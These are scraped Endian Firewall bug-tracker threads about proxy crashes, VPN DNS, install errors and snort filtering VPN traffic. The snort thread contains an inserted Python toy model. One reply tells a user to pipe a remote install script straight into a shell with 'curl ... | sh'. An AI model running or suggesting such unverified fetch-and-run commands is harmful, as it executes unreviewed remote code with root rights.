yes, I am Italian :-P we try to use English on the bugtrack so that the information in a ticket is useful for all the people around the world :)

Today I tried to replicate the problem on a 2.4.1 but without success, but I think I have discovered something interesting and the fact that you are using the package efw-clamav-2.3.17-0.endian5 is a great help for me!

Thanks a lot

Lo

--- TRANSLATED ---

Hi!

Yes, yes, I am Italian :-P we try to keep to English on the bugtracker because that way the information is useful to everyone in the world who has problems. Today I tried to replicate the problem with a 2.4.1 but I did not manage to.

In any case I think I have discovered something, and the fact that you are using the package efw-clamav-2.3.17-0.endian5 helps me a lot!

Thank you very much indeed

Lo
(0005510)
gmar_87   
2011-01-20 00:30   
My EFW 2.4.1 shows efw-clamav-2.4.4-0.endian8
(0005512)
claurita   
2011-01-20 08:25   
Hi everybody,
inserting myself in the thread because I have identical problem and made some tests I'd like to report.

Running 2.4.1, efw-clamav-2.4.4-0.endian8
The problem arises after a couple of hours since proxy reset, (under low traffic conditions). In my case, it's not related just to clam called from dansguardian. Using havp alone has about the same final effect, but squid reports a different error:
--------------
2011/01/18 23:57:00| helperOpenServers: Starting 20 'ncsa_auth' processes
2011/01/19 08:22:01| parseHttpRequest: Unsupported method '<D1><BC>Sp<D4><C1><D1><C6><AB><DD>^NY^R<89>^X<E3><E6><BA>^V^V=^Q^K<FC><D4><96>dx^S<93>bN^E<A8>KRi
<DF><99><8E>Wvh'
2011/01/19 08:22:01| clientReadRequest: FD 43 (192.168.18.54:1068) Invalid Request
--------------

I tried clamav updates from stellarcore.net (I've been using them since endian 2.0), actually clamav 0.95.5 and havp 0.91
Nothing seems changed, but I noticed that havp log claims an error in clamav:
-------------------
Jan 19 22:05:38 efw havp[32295]: Detected crashed ClamAV Library Scanner process (getanswer, pid: 32296, lasturl: http://www.google.it/search?)
Jan 19 22:05:38 efw havp[32295]: Scanner errors: ClamAV: Scanner crashed (lasturl: http://www.google.it/search?)
Jan 19 22:14:25 efw havp[537]: Detected crashed ClamAV Library Scanner process (getanswer, pid: 539, lasturl: http://suggestqueries.google.com/complete/search?)
Jan 19 22:14:25 efw havp[537]: Scanner errors: ClamAV: Scanner crashed (lasturl: http://suggestqueries.google.com/complete/search?)
---------------

If I could help with other tests, ask me.
Claudio
(0005651)
lorenzo-endian   
2011-02-09 22:19   
Hi everybody,

I have tested a lot havp and clamav and they don't freeze the system on my side.

Can I kindly ask you which version of HAVP your systems are running?

You can get it using

rpm -q efw-havp

Thanks to all in advance!

Lo
(0005652)
lorenzo-endian   
2011-02-09 22:28   
ps: On my system:

root@efw-lo-ce-2:~ # rpm -q efw-clamav
efw-clamav-2.4.4-0.endian8
root@efw-lo-ce-2:~ # rpm -q efw-havp
efw-havp-2.3.19-0.endian3
root@efw-lo-ce-2:~ # rpm -q squid
squid-2.6.STABLE22-6.endian10
root@efw-lo-ce-2:~ #
(0005653)
gmar_87   
2011-02-10 06:13   
My system:
root@PROXY1:~ # rpm -q efw-clamav
efw-clamav-2.4.4-0.endian8
root@PROXY1:~ # rpm -q efw-havp
efw-havp-2.3.19-0.endian3
root@PROXY1:~ # rpm -q squid
squid-2.6.STABLE22-6.endian10
root@PROXY1:~ #
(0005655)
claurita   
2011-02-10 08:25   
This is my "official" efw machine:
root@efw:~ # rpm -q efw-clamav
efw-clamav-2.4.4-0.endian8
root@efw:~ # rpm -q efw-havp
efw-havp-2.3.19-0.endian3
root@efw:~ # rpm -q squid
squid-2.6.STABLE22-6.endian10

Don't know if this could help:
I'm also actually testing efw on a pc without hd (I'm using a 2GB SD, tmpfs for /tmp and /var, 2 GB ram, NO swap). It's a fresh 2.4.1 install with the same patches applied as my "official" one, and works very well. Focusing, of course, on ram usage, I noticed that sometimes it starts rising and reaches 98% in few hours (normally is about 50%, low load, many days of working). At that point, havp crashes in a way much similar to the one focused in this thread. Haven't yet found the event which triggers this behaviour, but I suspect it could be exactly the same problem we're investigating here.
Claudio
(0005799)
ardit-endian   
2011-03-03 10:01   
(edited on: 2011-03-03 10:54)
Hi,

the problem is related to dansguardian, for some reason "the guy" goes down :)

http://pastie.org/1627966

The problem with dansguardian now is that it has no debug options [at least for this issue]. If you want dansguardian in debug mode, we need to compile the "debug version" of dansguardian:

http://contentfilter.futuragts.com/wiki/doku.php?id=using_a_debug_version

As the wiki says, this version is used for
"Unexplained frequent crashes when not even a stack backtrace identifies a resolution. "

I think this is the case.

In the past we have had several reports of the same problem and unfortunately dansguardian doesn't "say" much in the logs.

Regards,
Ardit.

(0005879)
diwoda   
2011-03-08 12:15   
Something new about this? I had a similar problem today, http proxy just stopped working, believing that it is the same issue. Flushing the Cache made it work again...Logs look quite the same as above...

greets
Johann
(0005889)
lorenzo-endian   
2011-03-08 15:43   
Hello diwoda,

we are working on it! I will keep you updated about the progress :)

Thanks for the patience

Lo
(0007087)
gvecchi   
2011-07-26 07:01   
(edited on: 2011-07-28 09:29)
Hi all!
I think I have the problem too.

root@PROXY:~ # rpm -q efw-clamav
efw-clamav-2.4.4-0.endian8
root@PROXY:~ # rpm -q efw-havp
efw-havp-2.3.19-0.endian3
root@PROXY:~ # rpm -q squid
squid-2.6.STABLE22-6.endian10
root@PROXY:~ # rpm -q efw-dansguardian
efw-dansguardian-2.4.1-2.endian15

after the weekly/daily automatic backup, dansguardian fails to start:


root@PROXY:~ # /etc/init.d/dansguardian restart
Stopping dansguardian: [FAILED]
Starting dansguardian: [FAILED]

Any workaround? Any news about solution?

Setting squid to allow traffic when dansguardian goes down may be a right workaround, isn't it?

Thanks!

(0008352)
victorhugops   
2012-12-10 15:49   
Hello,

here, we have the same problem (with the last endian version) !!! :-(
(0008368)
rbianchi   
2013-02-08 15:15   
We have the same problem with Endian Community ed. 2.5.1
Trying disable HAVP.
(0008415)
jejethx   
2013-04-06 20:27   
Hello,

Did you find a solution to this problem?
I increased MAXSERVERS & SERVERNUMBER in /var/efw/havp/settings:
MAXSERVERS=500
SERVERNUMBER=200
I set 1Mb of Squid cache, but it did not resolve it.

Regards
(0008418)
riaanjvr   
2013-04-16 19:29   
(edited on: 2013-04-16 19:38)
Hallo
This happens in the commercial Endian as well. I have the latest version 2.5.1 Endian appliance. In the Web IF one can see HAVP is not running. It broke after a while from setting it up, and I changed the P.I.C.S score from 50 to 100 in the content filter.

Flushing the cache, rebooting, en/disabling the proxy doesn't help
Forcing an update of Dansguardian rules doesn't help






View Issue Details
4540 [Endian Firewall] Endian Firewall major always 2013-04-16 17:25 2013-04-16 17:25
fernando.guse  
 
high  
new  
open  
none    
none  
   
DUAL LINK WAN
Hello

I have the following scenario for Internet access:

WAN0 - eth1: RED
WAN1 - eth4: RED

If I set any of the links as the second link shows MAIN FAILURE with the following log.

/var/log/messages
Apr 16 13:11:52 LOFW001GFT sudo: nobody : TTY=unknown ; PWD=/home/httpd/cgi-bin ; USER=root ; COMMAND=/etc/rc.d/uplinks start uplink1 --with-hooks
Apr 16 13:11:52 LOFW001GFT uplink[uplink1]: Starting Uplink 'uplink1'
Apr 16 13:11:53 LOFW001GFT kernel: [ 261.936098] e1000e 0000:01:00.1: irq 30 for MSI/MSI-X
Apr 16 13:11:53 LOFW001GFT kernel: [ 261.986175] e1000e 0000:01:00.1: irq 30 for MSI/MSI-X
Apr 16 13:11:53 LOFW001GFT kernel: [ 261.986492] ADDRCONF(NETDEV_UP): eth4: link is not ready
Apr 16 13:11:53 LOFW001GFT kernel: [ 262.606054] e1000e 0000:01:00.1: irq 30 for MSI/MSI-X
Apr 16 13:11:53 LOFW001GFT kernel: [ 262.656051] e1000e 0000:01:00.1: irq 30 for MSI/MSI-X
Apr 16 13:11:53 LOFW001GFT kernel: [ 262.656379] ADDRCONF(NETDEV_UP): eth4: link is not ready
Apr 16 13:11:53 LOFW001GFT uplink[uplink1]: Notify uplinks daemon about status change of uplink 'uplink1'. Status id FAILED
Apr 16 13:11:53 LOFW001GFT uplink[uplink1]: Uplink 'uplink1' status: 'OFFLINE'
Apr 16 13:11:53 LOFW001GFT uplink[uplink1]: Could not set up routing

As a way to circumvent the problem perform the following activities.

1) Link setup MAIN
2) mv /var/efw/uplinks/uplink1/failure /var/efw/uplinks/uplink1/active
3) ifconfig eth4 200.146.46.254 netmask 255.255.255.248

This way I can climb the two links but it is not the most pleasant thing to do.

Would like to help me solve this problem?

I await a return.

Sincerely.

Fernando Guse
There are no notes attached to this issue.





View Issue Details
4295 [Endian Firewall] Other Services minor always 2012-03-08 15:52 2013-04-12 16:54
shairozan  
christian-endian  
normal  
feedback 2.5  
reopened  
none    
none  
   
NTOP Segmentation Fault
Hello everyone,

I have noticed an issue with the 2.5.1 EFW Ntop that I wanted to report. After an out-of-the box installation, I tried to activate the NTOP monitoring system. It would run for a while (3-7 minutes) and then stop.

/etc/init.d/ntop status would return that ntop is dead, but a PID still exists.

I couldn't find any useful logs for ntop outside of monit.log, but it only ever contained information about the system starting and stopping. As such, I launched ntop using the configurations in /etc/ntop/ntop.conf (But I specified to use http 3001 not https 3001).

It seemed to work fine for a while, which blew my mind, but eventually it stopped with the following output:


Thu Mar 8 10:33:02 2012 THREADMGMT[t2967894960]: SIH: Idle host scan thread running [p9813]
Thu Mar 8 10:33:02 2012 THREADMGMT[t2976283568]: SFP: Fingerprint scan thread running [p9813]
Thu Mar 8 10:33:02 2012 THREADMGMT[t2917264304]: NPS(WAN): pcapDispatch thread starting [p9813]
Thu Mar 8 10:33:02 2012 THREADMGMT[t2917264304]: NPS(WAN): pcapDispatch thread running [p9813]
Thu Mar 8 10:33:02 2012 THREADMGMT[t2908875696]: NPS(2): Started thread for network packet sniffing [br0]
Thu Mar 8 10:33:02 2012 THREADMGMT[t2900487088]: NPS(3): Started thread for network packet sniffing [eth0]
Thu Mar 8 10:33:02 2012 THREADMGMT[t2908875696]: NPS(br0): pcapDispatch thread starting [p9813]
Thu Mar 8 10:33:02 2012 THREADMGMT[t2908875696]: NPS(br0): pcapDispatch thread running [p9813]
Thu Mar 8 10:33:02 2012 THREADMGMT[t2900487088]: NPS(eth0): pcapDispatch thread starting [p9813]
Thu Mar 8 10:33:02 2012 THREADMGMT[t2900487088]: NPS(eth0): pcapDispatch thread running [p9813]
./start_ntop.sh: line 2: 9813 Segmentation fault ntop --user ntop --db-file-path /var/ntop --interface eth1,br0,eth0 --trace-level 3 --https-server 0 --http-server 3001 --disable-schedyield --no-fc

It will start every time, but eventually fails with the segmentation fault
Attached is the shell script I was using to launch ntop
start_ntop.sh (163) 2012-03-08 15:52
https://bugs.endian.com/file_download.php?file_id=919&type=bug
Notes
(0007785)
shairozan   
2012-04-02 12:12   
Excuse me, but how is this resolved? You haven't given me any information as to if it was already fixed, a patch or anything.

Please advise.
(0007807)
christian-endian   
2012-04-04 20:35   
This has been resolved - not yet released, though (thus the bug has been resolved, not closed)!
An update should be out soon.
(0008417)
soportenalucho   
2013-04-12 16:54   
I have several firewall 2.5 and 2.5.1 version with the same problem ... is there any solution?





View Issue Details
4539 [Endian Firewall] Uncategorized major always 2013-04-11 10:28 2013-04-11 10:34
mvldebian  
 
normal  
new 2.5  
open  
none    
none  
   
Sarg generates no access denied
By enabling authenticated proxy the SARG can not generate the access denied page.
Enabling HTTP reports

*** Attached print behavior using authenticated proxy
When the proxy is transparent SARG generates the page in question. In other reports can also be viewed DENIED beside the URL accessed.
Sem título.png (5,796) 2013-04-11 10:28
https://bugs.endian.com/file_download.php?file_id=1046&type=bug
transparent_proxy.png (52,981) 2013-04-11 10:34
https://bugs.endian.com/file_download.php?file_id=1047&type=bug
There are no notes attached to this issue.





View Issue Details
4532 [Endian Firewall] OpenVPN Client and Server major always 2013-02-19 05:31 2013-04-07 16:40
d072330  
 
normal  
new 2.5  
open  
none    
none  
   
2.5.1 DNS issue openvpn
I have installed 2.5.1 several times now on different hardware and version 2.5.1 will not push DNS servers to clients. Clients can ping and get to servers by IP but not FQDN. If I install 2.5.0 it pushes the DNS servers every time. It looks to us that the OpenVPN version is the same in both versions so why does one version push DNS and the other does not?

Any suggestions before I rebuild to 2.5.0?
Install 2.5.1 with same OpenVPN settings and firewall rules as 2.5.0.
Notes
(0008384)
d072330   
2013-02-20 18:33   
Work around:

Add these lines for each DNS server you want to push to

/etc/openvpn/openvpn.conf.tmpl

push "dhcp-option DNS 10.X.X.X"
push "dhcp-option DNS 10.X.X.X"

Then when you restart the OpenVPN server the changes stick in /etc/openvpn/openvpn.conf
(0008405)
richardsk   
2013-03-27 17:09   
(edited on: 2013-03-27 17:14)
Where are these clients authenticating from, locally or thru LDAP?
I've found that the case of the username characters is an issue for VPN, and also using the # character as the first character in your password.

Example:

Username- Doej vs doej - Doej gets no DNS options while doej gets a different IP address and gets DNS options. Theoretically they are the same user but Endian doesn't see it that way, just the beauty of unix at work.

Password- #Joedoe1 - Pound/Number sign causes Endian to ignore password submitted. Maybe because pound is the character to notify system to ignore or treat following as a comment.






View Issue Details
4231 [Endian Firewall] Installation tweak always 2011-12-29 20:59 2013-04-07 04:08
piratpl  
 
normal  
feedback 2.5  
open  
none    
none  
   
"Your Harddisk is to small" error message during install of 2.5 version
When installing 2.5 on VMware with a disk 15GB or less the installation fails with an error message "Your harddisk is to small" sh: -c line 0: unexpected EOF while looking for matching '"
It could very well be that you need a bigger hd to install 2.5 however, I was able to install 2.41 on a 10GB drive.
I didn't find the minimum hd requirement during my install as i'm limited to 15 GB at the moment.
Notes
(0007588)
aender   
2011-12-30 06:37   
With Virtualbox and a 8GB disk the installation is not problem. Could it be that this is only a problem with vmware?
(0007611)
christian-endian   
2012-01-10 08:56   
Tried installing on a VMware virtual machine with 8GB disk space and had no problems at all. How did you configure your virtual machine? What kind of disk controller did you use?
(0007623)
abhijeet1984   
2012-01-12 10:31   
Hiiii..

I am also suffering from this problem.

I am installing Endian 2.5 on an IBM x3550 server but the installation fails with an error message "Your harddisk is to small" sh: -c line 0: unexpected EOF while looking for matching '"
(0007632)
christian-endian   
2012-01-17 08:50   
Can you switch to the second console after you see this message? Is there anything else you see?
You can switch with Alt+F2

Thank you
(0007695)
piratpl   
2012-02-05 17:52   
I was not able to reproduce the issue after I rebooted the vSphere server.
(0007696)
Byzt   
2012-02-05 19:58   
Hi;

I'm having the same problem. But I installed 2.4.1
(0007716)
Beorn   
2012-02-14 08:40   
(edited on: 2012-02-14 08:46)
Error at the vmware esxi 5.0 console:
"Scanning target drives
Check fot hardware raid controller: NOT FOUND"

Edit: Works with SCSI Controller LSI Logic Parallel
NOT with LSI Logic SAS and VMWare Paravirtual

(0007717)
mudgie   
2012-02-15 01:12   
This happened the first time I did a VMware ESXi install. I originally let it default to "Red Hat Enterprise Linux 6 (32-bit)" but it defaulted to the VMware Paravirtual controller, which indicated insufficient space. Choosing "custom" and "Other Linux (32-bit)" defaulted the controller to LSI Logic Parallel, which worked fine.
(0008416)
soypin8   
2013-04-07 04:08   
Use Red Hat Enterprise 6, it works.





View Issue Details
2464 [Endian Firewall] Firewall (iptables) major always 2009-12-01 03:53 2013-04-03 10:09
vikash  
peter-endian  
normal  
confirmed 2.3  
open  
none    
none  
  future  
Snort blocks smb and netbios over VPN despite FW rule
I've got EFW 2.3 with openvpn and the client is a roadwarrior. VPN works fine, i.e. I can ping and SSH to machines on the GREEN zone to/from the openvpn client.

PING OK : VPN client <----> GREEN zone
SSH OK : VPN client <----> GREEN zone
smb/netbios BLOCKED : VPN client <----> GREEN zone

After almost a week I figured out that snort(IPS) will block smb and netbios over the VPN despite the VPN firewall rule to allow all access, also same result if VPN firewall is disabled.

If I switch off IPS then file and print sharing WORKS. There is nothing in the logs about these packets being blocked otherwise I would have found out much earlier.

Please advise a fix to this.
Notes
(0003518)
vikash   
2009-12-06 04:23   
If I disable the rule "ET SCAN Behavioral Unusual Port 445 traffic, Potential Scan or Infection" in the IPS rule editor then file and print sharing works fine.
(0003519)
mrkroket   
2009-12-07 15:01   
Firewall rules in EFW 2.3 have two types of allowing traffic to pass: "ALLOW" (a green arrow) and "ALLOW with IPS" (green arrow with a magnifying glass). The former doesn't go thru IPS.

 Maybe you can just use "ALLOW" instead of "ALLOW with IPS" on your FW VPN rules for port 445, this way your smb VPN traffic won't be IPS inspected and you don't need to disable that IPS rule.
(0003520)
vikash   
2009-12-07 15:26   
Yes, I understand how it is supposed to work. However even if I turn off the VPN firewall snort is still filtering the VPN traffic. I have also tried to enable the VPN firewall and create a rule to "ALLOW" all traffic but still I have the same result.

Currently VPN firewall is enabled with the following rule:
Source : GREEN + OPENVPN
Destination : GREEN + OPENVPN
Service : <ANY>
Policy : ALLOW

But still I need to disable snort rules.
(0003523)
peter-endian   
2009-12-07 18:05   
can you post the output of:

iptables -vnL VPNFW


it should use ACCEPT targets instead of ALLOW, in order not to pass through snort.
(0003525)
vikash   
2009-12-08 11:37   
VPN firewall enabled with the above rule, output as below:
# iptables -vnL VPNFW
Chain VPNFW (7 references)
 pkts bytes target prot opt in out source destination
39786 5732K ACCEPT all -- br0 br0 0.0.0.0/0 0.0.0.0/0

VPN firewall disabled, output as below:
# iptables -vnL VPNFW
Chain VPNFW (7 references)
 pkts bytes target prot opt in out source destination
    0 0 ALLOW all -- * * 0.0.0.0/0 0.0.0.0/0

In both cases snort is filtering my VPN traffic.
(0003533)
peter-endian   
2009-12-09 15:10   
ok, when vpn firewall is disabled, it uses ALLOW, which is wrong.. i fixed that

but, when the vpn firewall is enabled and it uses ACCEPT, it should not pass through snort. can you confirm that?

the ACCEPT rule for sure does not pass through snort. if it still passes, there must be another rule which does.
(0003537)
vikash   
2009-12-10 06:57   
OK, I will update you on that ASAP.

FYI, both of my outgoing and inter-zone traffic firewall is switched off and I found that the chains are using ALLOW as below:

Chain OUTGOINGFW (1 references)
 pkts bytes target prot opt in out source destination
    0 0 ALLOW all -- br1 ppp0 0.0.0.0/0 0.0.0.0/0
    0 0 ALLOW all -- br2 ppp0 0.0.0.0/0 0.0.0.0/0
 496K 37M ALLOW all -- br0 ppp0 0.0.0.0/0 0.0.0.0/0

Chain ZONEFW (1 references)
 pkts bytes target prot opt in out source destination
    0 0 ALLOW all -- br0 br0 0.0.0.0/0 0.0.0.0/0
    0 0 ALLOW all -- br0 br2 0.0.0.0/0 0.0.0.0/0
    0 0 ALLOW all -- br0 br1 0.0.0.0/0 0.0.0.0/0
    0 0 ALLOW all -- br2 br2 0.0.0.0/0 0.0.0.0/0
    0 0 ALLOW all -- br1 br1 0.0.0.0/0 0.0.0.0/0
(0003540)
luca-endian   
2009-12-10 12:04   
Actually disabled means a default inter-zone firewall configuration.
(0003542)
vikash   
2009-12-10 13:42   
peter: I have tested again and even when the rule is ACCEPT snort will still filter the traffic.

# iptables -vnL VPNFW
Chain VPNFW (7 references)
 pkts bytes target prot opt in out source destination
 2199 295K ACCEPT all -- * * 0.0.0.0/0 0.0.0.0/0

Please check what else is wrong.
(0003563)
vikash   
2009-12-16 00:09   
Hi, Please let me know if you need any further information for diagnosis.
(0003589)
peter-endian   
2009-12-18 18:44   
if the rule is ALLOW and snort is disabled, that's fine. the ALLOW chain does not pass to snort if snort is disabled. if you enable it it will pass it.

ACCEPT definitively does not pass to snort.
so there must be another ALLOW rule which passes

wow.. well it is indeed:

  26M 23G ALLOW all -- * * 0.0.0.0/0 0.0.0.0/0 state RELATED,ESTABLISHED

uhm.. did not think about this. not so easy to solve this however.
i must rethink it :/
(0003598)
peter-endian   
2009-12-19 01:21   
2 possible solutions (however no chance to solve quickly)
probably (hopefully) there's a 3rd (the easier one)

solution 1:
- mark connections whose syn packet goes to the QUEUE
- ALLOW only related/established packets which are marked
- ACCEPT not marked packets
X problem: we exhausted the mark bandwidth. using 1 bit of another bitmask is
  currently a bad option.. maybe after kernel-upgrade
x big mess with all those markings

solution 2:
- move the accept all established/related rule to the LOGDROP chains in
  order that every firewall subsystem accepts its own established/related
  connections
- always create also an established/related rules before each ALLOW rule
X each established packet need to pass a lot of unnecessary rules
X much more rules than before

would be nice if connection tracking table would know if packets of the connections passed QUEUE.
(0008414)
peter-endian   
2013-04-03 10:09   
well. the assumption that CONNMARK is working only in the mangle table was simply wrong.

solution 3:
- before passing to the QUEUE target, CONNMARK
- established/related rule should only ALLOW if it is CONNMARKed otherwise ACCEPT
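
The behaviour diagnosed in this thread, as an added example (a toy model, not Endian's code): a connection whose first packet is ACCEPTed still has its later packets queued to snort by the blanket "ALLOW ... state RELATED,ESTABLISHED" rule, while the CONNMARK approach of solution 3 keeps them out. The mark value, the rule table and the flow names are assumptions made for the illustration.

```python
from dataclasses import dataclass, field

IPS_MARK = 0x1  # hypothetical connmark value: "first packet was queued to the IPS"


@dataclass
class Firewall:
    """Toy model of the rule layout discussed above; all names are illustrative."""
    use_connmark: bool   # False: blanket ALLOW for established; True: solution 3
    new_rules: dict      # dport -> "ALLOW" (to IPS) or "ACCEPT" (no IPS) for NEW packets
    conntrack: dict = field(default_factory=dict)  # flow id -> connmark

    def handle(self, flow, dport):
        """Return 'IPS' if this packet is queued to snort, else 'ACCEPT' or 'DROP'."""
        if flow in self.conntrack:  # state RELATED,ESTABLISHED
            if not self.use_connmark:
                # "ALLOW all ... state RELATED,ESTABLISHED": everything goes to the queue
                return "IPS"
            # solution 3: ALLOW only if the connection was CONNMARKed, otherwise ACCEPT
            return "IPS" if self.conntrack[flow] & IPS_MARK else "ACCEPT"
        target = self.new_rules.get(dport, "DROP")
        if target == "DROP":
            return "DROP"
        # state NEW: track the connection, marking it only when it goes to the queue
        self.conntrack[flow] = IPS_MARK if target == "ALLOW" else 0
        return "IPS" if target == "ALLOW" else "ACCEPT"


def trace(use_connmark, new_rules, dport, packets=4):
    """Verdicts for the first few packets of one connection to dport."""
    fw = Firewall(use_connmark, new_rules)
    flow = ("vpn-client", "green-host", dport)  # constructed flow id
    return [fw.handle(flow, dport) for _ in range(packets)]


def ips_leaks(use_connmark, new_rules):
    """Ports whose NEW rule is ACCEPT but whose later packets still reach the IPS."""
    return sorted(port for port, target in new_rules.items()
                  if target == "ACCEPT" and "IPS" in trace(use_connmark, new_rules, port))


# Constructed policy: SMB exempt from the IPS, HTTP inspected.
RULES = {445: "ACCEPT", 80: "ALLOW"}

if __name__ == "__main__":
    for mode in (False, True):
        print("connmark" if mode else "blanket ", trace(mode, RULES, 445), ips_leaks(mode, RULES))
```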





View Issue Details
4538 [Endian Firewall] GUI minor always 2013-04-03 07:26 2013-04-03 07:28
mgr9500  
 
high  
new  
open  
none    
none  
   
calendar problem, duplicate day
In month 3, day 16 is duplicated in year 2013, and in year 2012 day 17 is duplicated.
Please, after removing this bug, send it to me.
mgr9500@yahoo.com
Notes
(0008413)
mgr9500   
2013-04-03 07:28   
Sorry my English is not good, but I LIKE ENDIAN :-*





View Issue Details
4497 [Endian Firewall] OpenVPN Client and Server minor always 2012-11-14 08:34 2013-03-22 16:26
ipanema211  
 
normal  
new 2.5  
open  
none    
none  
   
Openvpn GUI settings not saved to settings file - settings file resets when saving via GUI
Hello,

I upgraded our firewall from 2.4.1 to 2.5. I restored a backup to do this, mainly because we have around 150 openvpn users I didn't want to recreate.

When I try to save global options in the GUI, nothing is saved to the /etc/openvpn.conf file. When I edit the conf file and restart the Openvpn service through SSH, everything is OK and the options are pushed correctly. The options aren't displayed in the GUI though.

When I then try to change a global option in the GUI, or even just click the save & restart button in the GUI, the openvpn.conf file gets reset to default, and my clients receive the DNS servers below instead of their correct ones (at that moment no DNS servers are defined in the conf file because of the reset)

DNS Servers . . . . . . . . . . . : fec0:0:0:ffff::1%1
                                    fec0:0:0:ffff::2%1
                                    fec0:0:0:ffff::3%1


Thanks!
Notes
(0008362)
ipanema211   
2013-01-07 17:33   
THIS BEHAVIOUR IS REPRODUCIBLE!!!

Dear staff, this is a real bug. Please take a look at it...

I confirm this happens to all systems when restoring a 2.4 backup!
(0008395)
richardskamar   
2013-03-22 16:26   
I've had a similar problem however it is when i edit var/efw/openvpn/settings file and make changes for my ldap settings, the parameters within the file specifically the following lines

LDAP_BIND_DN=cn=EndianLDAP,ou=Service Accounts,dc=mydomain,dc=com

LDAP_USER_BASEDN=ou=All Users,dc=mydomain,dc=com

After administering VPN via SSH and restarting the openvpn service through SSH, everything is OK. However, when I then try to change a global option in the GUI, or even just click the Save & Restart button in the web GUI (VPN > Advanced), the settings file (var\efw\openvpn\settings) gets modified as shown below from the original modification above, and my clients receive an auth error trying to VPN in. Note the added quotations appended.

LDAP_BIND_DN='cn=EndianLDAP,ou=Service Accounts,dc=mydomain,dc=com'

LDAP_USER_BASEDN='ou=All Users,dc=mydomain,dc=com'

These quotes now appear and seem to be causing a problem, thus to remedy it I have to make all global changes first, then edit the settings file and restart the openvpn service via the ssh interface.





View Issue Details
3432 [Endian Firewall] Proxy HTTP major always 2011-01-14 16:06 2013-03-11 08:41
ardit-endian  
peter-endian  
normal  
feedback 2.4.1  
open  
none    
none  
   
HAVP => no youtube videos from iphone & ipad
When HAVP is enabled we are unable to see youtube videos with iphone or ipad.
when is disabled the problem disappears.

The issue is reproducible and the zone is indifferent (green/orange or blue).

I noticed testing this that the cause is havp but no error message in the log.

System tested was full up-to-date.
Notes
(0005478)
baldy   
2011-01-15 13:26   
(edited on: 2011-01-15 13:31)
Hi Ardit,

the option "SKIPMIME image/* video/* audio/*" should fix the problem.

Option should be added to /etc/havp/havp.conf
Not sure whether the file will be overwritten when the process restarts.

http://www.ipcops.com/phpbb3/viewtopic.php?f=7&t=14274

regards,

Baldy

(0005479)
ardit-endian   
2011-01-17 08:31   
Hi Baldy,

Actually, there is a Mime Type option in Access Policy rules but it is applicable only with "deny access"

We should try putting SKIPMIME image/* video/* audio/* to havp.conf.tmpl (this modification is permanent) and see if this solves the problem.

nice catch,

I hope that there will be a fix included in the next update.

Regards,
Ardit.
(0005480)
ardit-endian   
2011-01-17 09:55   
(edited on: 2011-01-17 09:59)
NOTE:

Option not supported in havp 0.90 (currently installed in 2.4 enterprise), option available only with 0.92 and up*

Please note:

update also;
dansguardian,
squid,
clamav

(0005877)
diwoda   
2011-03-08 11:57   
Sorry, but this bug is NOT minor at all!

Especially not in Hotspot environments but also in everyday life! Just think about the immense number of iphone and ipad users!

Kindly request a FAST solution! (bypassing the proxy is no option because it is not possible to enter each MAC or IP Address manually...)
(0006342)
timboau   
2011-05-16 04:59   
Hi,
Has any progress been made with this.

I'm looking at deploying Endian as a firewall/proxy and everything was working perfectly until I deployed it and users started complaining about videos not streaming. It appears they are Flash videos that are not working.
Unfortunately this will be a deal breaker for me and I will have to look elsewhere. I'm happy to exclude the complete site from the proxy if necessary; however, that didn't seem to make any difference.

Could it be anything to do with RTMP Protocol?
(0006515)
baldy   
2011-05-26 23:00   
Hi timboau,

Can you test this package and post back the results ?

From a ssh session: curl bugfixes.endian.com/havp-clam/install | sh

I have been testing this package for different reasons, but should fix your problem in combination with the /SKIPMIME option above.

Regards,

Klaas-Jan
(0006558)
davezeking   
2011-06-02 10:18   
Hi baldy,

I've been having the same issue with Youtube and HTML5 videos on the iPad, I tried your fixes (the update and SKIPMIME directive), this still didn't fix the issue.

After hours of messing around I've worked out that the RANGE command needs to be supported by the proxy in order to use pseudo HTTP Streaming on iOS.

If you add the following line to /etc/havp/havp.conf.tmpl:

RANGE true

And then save your changes via the web interface so the template is written into the live config file you should find that both the YouTube app and HTML5 videos in Safari now work.

In the end I commented out the SKIPMIME directive as this didn't seem to help and also seems less secure.

Regards,

Dave.
(0007767)
luca-endian   
2012-03-27 12:08   
rpm -q havp
havp-0.92a-2.endian15

root@stan:/etc/havp # cat havp.conf | grep SK
SKIPMIME image/* video/* audio/*

Doesn't fix the problem..
(0007768)
luca-endian   
2012-03-27 13:11   
rpm -q havp
havp-0.92a-2.endian15

root@stan:/etc/havp # cat havp.conf | grep RANGE
RANGE true

youtube and appstore on iphone works
(0007906)
fqureshi   
2012-06-07 22:10   
I was facing the same issue. First I passed the argument of "RANGE true"; it didn't work. Then I checked the version of havp, which is havp-0.92a-2.endian15.

Then I added SKIPMIME image/* video/* audio/*
everything is working as desired. Thus I am passing two arguments in havp.config.tmpl file

RANGE true
SKIPMIME image/* video/* audio/*
(0008007)
Lyve   
2012-08-11 16:07   
Thanks @fqureshi this fixed the problem for me, too.
(0008008)
ardit-endian   
2012-08-13 08:13   
@everyone,

Yes, SKIPMIME will fix the issue, but it will also not scan any image, picture or audio for viruses.

Don't use this setting in critical environments where you rely on the antivirus for protecting your data.
(0008391)
herbert-endian   
2013-03-11 08:41   
Hi Guys,

I have a customer with the same issue on all of his Machines.
I gave him the workaround with the information from Ardit, that he should pay attention.
When would this Bug be fixed?

Please let me know.
Cheers.

Herbert





View Issue Details
4535 [Endian Firewall] VPN - IPSec major always 2013-03-01 02:15 2013-03-01 02:15
EduSuzuki Endian 2.5 Community  
 
normal  
new 2.5  
open  
none    
none  
   
Endian 2.5 Community does not accept special characters in the PSK
I'm trying to use a PSK for the establishment of an IPsec tunnel. This PSK contains some special characters, such as * and &.

When I try to set this PSK up at an Endian 2.5 Community firewall, it complains about these characters with an error message like this:

"Invalid characters found in the pre-shared key."

I've searched the issues database and found the issue 0000613 where the situation is the same. The person responsible for the ticket says it's solved but I'm facing the same issue on version 2.5.

Please help me out.
Set up a new IPsec connection.
Use PSK as the authentication method for the 1st phase of the IPsec tunnel establishment.
Use a pre-shared key that has special characters. E.g.: PsK_913*&
There are no notes attached to this issue.





View Issue Details
1151 [Endian Firewall] Firewall (iptables) crash always 2008-07-23 10:10 2013-02-22 13:58
jasonwalls  
peter-endian  
normal  
confirmed 2.5  
open  
none    
none  
  future  
portforwarding: unable to access GREEN from GREEN via RED portforward rule
as per summary, a device on the GREEN network is unable to access another device on the GREEN network, by using the RED interface and portforwarding.

we configure mobile devices to access resources on the GREEN network, by using the RED device and port forwarding. they can operate onsite and offsite (without vpn) this way.
Notes
(0001512)
peter-endian   
2008-08-08 11:11   
